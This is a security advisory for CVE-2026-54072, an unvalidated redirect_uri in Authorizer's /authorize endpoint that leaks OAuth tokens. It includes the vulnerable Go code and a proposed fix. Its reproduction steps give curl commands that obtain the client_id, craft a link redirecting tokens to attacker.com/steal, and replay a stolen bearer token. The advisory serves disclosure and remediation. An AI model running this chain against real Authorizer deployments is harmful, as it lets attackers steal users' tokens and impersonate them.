PT-2026-57366 · Go · Github.Com/Authorizerdev/Authorizer

Publicado

2026-07-10

·

Atualizado

2026-07-10

·

CVE-2026-54072

CVSS v3.1

9.3

Crítica

VetorAV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Summary

The /authorize endpoint accepts any redirect uri without validating it against AllowedOrigins. When response type=token or response type=id token, the server appends access token, id token, and refresh token as query parameters and issues a 302 redirect to the attacker-supplied URL. An unauthenticated attacker can obtain the required client id from the public /graphql?query={meta{client id}} endpoint.
Partial fix was applied in v2.0.1 to other handlers (oauth login, verify email, magic link login, forgot password, invite members, oauth callback) but /authorize was not included.

Vulnerable Code

internal/http handlers/authorize.go:
go
redirectURI := strings.TrimSpace(gc.Query("redirect uri"))
// ... no IsValidOrigin() call ...
// response type=token path (line ~263):
if strings.Contains(redirectURI, "?") {
  redirectURI = redirectURI + "&" + params
} else {
  redirectURI = redirectURI + "?" + params
}
handleResponse(gc, responseMode, authURL, redirectURI, ...) // 302 to attacker URL
Compare with the fixed oauth login.go in v2.0.1 which calls validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins).

Steps to Reproduce

bash
# 1. Obtain client id (no authentication required)
CLIENT ID=$(curl -s http://TARGET/graphql 
 -H "Content-Type: application/json" 
 -d '{"query":"{meta{client id}}"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['meta']['client id'])")

echo "client id: $CLIENT ID"

# 2. Craft the malicious URL and send to victim (victim must be logged in)
# When victim opens this URL, tokens are delivered to attacker.com
MALICIOUS URL="http://TARGET/authorize?response type=token&client id=${CLIENT ID}&redirect uri=https://attacker.com/steal&scope=openid+profile+email&state=x&response mode=query"

echo "Send to victim: $MALICIOUS URL"

# 3. Attacker receives 302 redirect with all tokens:
# https://attacker.com/steal?access token=eyJ...&token type=bearer&expires in=...&id token=eyJ...

# 4. Validate stolen token
curl -s http://TARGET/userinfo 
 -H "Authorization: Bearer STOLEN ACCESS TOKEN"
# Returns: {"email":"victim@example.com","id":"...","roles":["user"]}

Impact

An attacker who tricks a logged-in user into clicking a crafted link can steal the victim's access token, id token, and refresh token. The attacker can then impersonate the victim for the full token lifetime. No user interaction beyond clicking the link is required; the victim's browser issues the redirect automatically.

Proposed Fix

Add the same IsValidOrigin check that was applied to the other handlers in v2.0.1:
go
// In authorize.go, after reading redirect uri:
if !validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins) {
  handleResponse(gc, responseMode, authURL, redirectURI, map[string]interface{}{
    "error":       "invalid request",
    "error description": "redirect uri is not allowed",
  }, http.StatusBadRequest)
  return
}

Correção

Open Redirect

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

CVE-2026-54072
GHSA-H29V-HJ44-Q8CV

Produtos afetados

Github.Com/Authorizerdev/Authorizer